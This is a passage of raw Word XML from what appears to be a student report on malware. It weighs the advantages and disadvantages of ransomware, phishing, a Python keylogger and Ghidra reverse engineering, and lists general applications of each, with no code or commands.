    <w:p w14:paraId="196E1AB7" w14:textId="02F0FA33"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 a) Financial Gain: Ransomware provides attackers with a lucrative business model, as victims are often willing to pay a ransom to regain access to their encrypted files or systems. b) Wide-reaching Impact: Ransomware can rapidly spread across networks and infect multiple devices, allowing attackers to target individuals, businesses, and even critical infrastructure, maximizing their potential for financial gain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765D9955"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Disadvantages: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB8334"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a) Data Loss and Disruption: Ransomware encrypts or locks victims' files, rendering them inaccessible until a ransom is paid. This can result in data loss, operational disruptions, and financial damages for individuals and organizations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38702CD1"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b) Reputation Damage: Falling victim to a ransomware attack can lead to reputational damage for businesses, eroding customer trust and confidence in their ability to protect sensitive information. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30039002" w14:textId="35E54AB7"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c) Incentive for Attackers: Paying ransoms fuels the profitability of ransomware attacks and incentivizes attackers to continue their malicious activities, perpetuating the cycle of cybercrime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D3E53" w14:textId="57CDB43D" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:ind w:firstLine="360"/>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3.  </w:t>
      </w:r>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Advantages of Phishing Emails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1CD191" w14:textId="2FD85F73" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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Social Engineering Tactics: Phishing emails leverage psychological manipulation techniques to exploit human vulnerabilities, such as curiosity, fear, or greed. This makes them highly effective in tricking recipients into taking the desired actions, such as clicking on malicious links or providing sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0723B" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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Large-Scale Targeting: Phishing emails can be sent to a large number of recipients simultaneously, increasing the potential pool of victims. Attackers can cast a wide net to reach individuals across various demographics, increasing their chances of success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B1102" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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Mimicking Legitimate Sources: Phishing emails often mimic the branding, logos, and email addresses of trusted organizations, making them appear legitimate to unsuspecting recipients. This increases the likelihood of recipients falling for the scam and providing sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D84FD2" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:ind w:left="360"/>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Disadvantages of Phishing Emails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737AF9D0" w14:textId="78299ADB" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Legal Consequences: Engaging in phishing activities is illegal and subject to legal consequences. Perpetrators can face charges related to identity theft, fraud, and unauthorized access to computer systems, leading to significant legal penalties if caught.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCE8830" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Damage to Reputation: Falling victim to a successful phishing attack can damage an individual's or organization's reputation. It erodes trust and confidence among </w:t>
      </w:r>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>customers, clients, and stakeholders, potentially leading to financial losses and a decline in business opportunities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B7B5E" w14:textId="77777777" w:rsidR="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Financial and Data Losses: Phishing attacks can result in significant financial and data losses. Victims may experience unauthorized access to bank accounts, credit card fraud, identity theft, and exposure of sensitive personal or corporate data, leading to financial and reputational damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2757BB" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2E3193" w14:textId="412352DD" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Python Keylogger for Security Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F857ADE"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Advantages: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B37B478"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a) Intrusion Detection: The Python keylogger can be used as a security monitoring tool to detect unauthorized access attempts and suspicious activities on a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76F99C"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 b) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analysis: By monitoring keystrokes, the keylogger can help identify patterns and anomalies that may indicate a security breach or suspicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1330D0A3" w14:textId="23136784"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c) Early Warning System: The keylogger can provide early warnings of potential security incidents, allowing prompt investigation and response to mitigate risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCA9340"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Disadvantages: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B41A6E"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a) Legal Considerations: The use of keyloggers, even for security purposes, may raise legal and ethical concerns. It is important to comply with applicable laws and regulations and obtain proper authorization for such monitoring activities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A459CD"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b) Privacy Concerns: Keyloggers have the potential to capture sensitive information, including passwords and personal data. Safeguards must be in place to protect the privacy and confidentiality of individuals' information. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0B6FC" w14:textId="4366C51A"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c) False Positives: Keyloggers may generate false positives, flagging legitimate user activities as suspicious. This can lead to unnecessary investigations and potential disruptions in user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4638BD1C" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:num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Reverse Engineering using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4683034E"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Advantages: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A321128"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a) Vulnerability Identification: Reverse engineering with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help identify vulnerabilities in software, enabling developers to patch security flaws and improve the overall resilience of their applications. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465282FE"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b) Enhanced Understanding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows for a deeper understanding of software internals, facilitating the development of more secure and efficient code and aiding in debugging and troubleshooting efforts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BBB3AA" w14:textId="1DC915B5"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c) Malware Analysis: Reverse engineering with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is instrumental in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and understanding malware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, assisting in the development of effective detection and mitigation techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2795DAA9"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Disadvantages: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0EAB8E"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">a) Expertise and Time Requirements: Effective reverse engineering using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires specialized knowledge and expertise. It can be time-consuming, especially for complex applications or sophisticated malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF3083" w14:textId="77777777" w:rsid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 b) Legal Considerations: Reverse engineering certain software may be subject to legal restrictions. It is important to adhere to copyright laws, intellectual property rights, and any applicable licensing agreements. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E84818" w14:textId="36D86032"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c) Complex Analysis: Reverse engineering complex software can be challenging, as it may involve obfuscated code, anti-debugging techniques, or encryption, requiring advanced skills to overcome these obstacles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A227132" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Overall, while these malware techniques can have their advantages for attackers, they pose significant risks and consequences for victims. Similarly, the proposed solutions, such as the Python keylogger and reverse engineering with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, have their advantages but must be used responsibly and within legal and ethical boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDADE8" w14:textId="65624123" w:rsidR="00C24704" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00C24704">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00C24704" w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>APPLICATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0510715E" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Spyware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D9E7DB"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Employee Monitoring: Companies may use spyware to monitor employee activities on company-owned devices to ensure compliance with policies and prevent data breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA0AC0D"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Parental Control: Parents can utilize spyware to monitor their child's online activities and protect them from potential risks and inappropriate content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5535B"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Law Enforcement: Spyware can be used by law enforcement agencies to track and gather evidence against criminals involved in cybercrimes or other illegal activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B7B5C" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Ransomware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12086632"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Financial Gain: Cybercriminals use ransomware to extort money from individuals, businesses, or even government organizations by encrypting their files and demanding ransom payments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6745439C"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Cyber Warfare: Ransomware can be deployed as a tool for cyber warfare, targeting critical infrastructure, government systems, or military networks to disrupt operations or gain leverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673FA165"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Education and Training: Organizations may simulate ransomware attacks as part of cybersecurity training programs to educate employees about the risks and teach them how to respond effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1F84D9" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Trojan Keylogger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738348D"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Digital Forensics: Keyloggers can be used by digital forensic investigators to gather evidence in criminal investigations, such as capturing keystrokes related to illicit activities or uncovering passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5244D625"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lastRenderedPageBreak/>
        <w:t>Security Audits: Organizations may employ keyloggers during security audits to identify vulnerabilities in their systems, such as weak passwords or unauthorized access attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D829E0"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 xml:space="preserve">User Monitoring: Keyloggers can be utilized in educational or research settings to track user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gather data for analysis, such as studying human-computer interaction or user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB4773" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Phishing Emails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5180CEC8"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Security Awareness Training: Phishing emails are often used in security awareness training programs to educate individuals about the techniques employed by attackers and to teach them how to identify and avoid falling for phishing attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589BDD9"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Incident Response: Organizations utilize phishing emails in incident response exercises to assess their preparedness and train their employees in responding to real-life phishing incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20451CF4" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>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 xml:space="preserve">Cybersecurity Research: Phishing emails serve as valuable samples for cybersecurity researchers to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> trends, techniques, and tactics used by cybercriminals, aiding in the development of improved </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanisms and countermeasures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49179AFF" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="002C7722" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59575418" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:p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Reverse engineering is a valuable technique with various applications across different industries and fields. Here are some common applications of reverse engineering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0641F690" w14:textId="77777777" w:rsidR="00F922F6" w:rsidRPr="00F922F6" w:rsidRDefault="00F922F6" w:rsidP="00F922F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Software Analysis and Debugging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C9D9F"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 xml:space="preserve">Understanding Legacy Systems: Reverse engineering helps in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and understanding existing software systems, especially legacy systems with limited documentation, allowing developers to make enhancements or integrate new technologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3257B627"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 xml:space="preserve">Bug and Vulnerability Detection: Reverse engineering assists in identifying software bugs, vulnerabilities, and security flaws by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F922F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the code and understanding the underlying logic.</w:t>
      </w:r>
    </w:p>
